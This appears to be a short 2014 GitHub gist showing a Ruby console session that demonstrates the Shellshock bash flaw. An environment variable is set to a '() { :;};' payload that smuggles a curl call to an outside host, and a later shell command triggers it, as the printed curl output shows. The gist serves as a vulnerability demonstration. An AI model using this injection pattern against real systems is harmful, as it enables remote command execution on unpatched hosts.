Skip to content

Instantly share code, notes, and snippets.

@cantino
Created September 25, 2014 04:44
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save cantino/9fe5f338e5027a46e2eb to your computer and use it in GitHub Desktop.
Save cantino/9fe5f338e5027a46e2eb to your computer and use it in GitHub Desktop.
computers_suck.txt
1.9.3-p484 :027 > ENV['x'] = '() { :;}; curl http://my.domain.com:8000'
=> "() { :;}; curl http://my.domain.com:8000"
1.9.3-p484 :028 > `uname -a 2>/dev/null`
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 178 100 178 0 0 2858 0 --:--:-- --:--:-- --:--:-- 2870
=> "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\"><html>\n<title>Directory listing for /</title>\n<body>\n<h2>Directory listing for /</h2>\n<hr>\n<ul>\n</ul>\n<hr>\n</body>\n</html>\n"
1.9.3-p484 :029 >
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment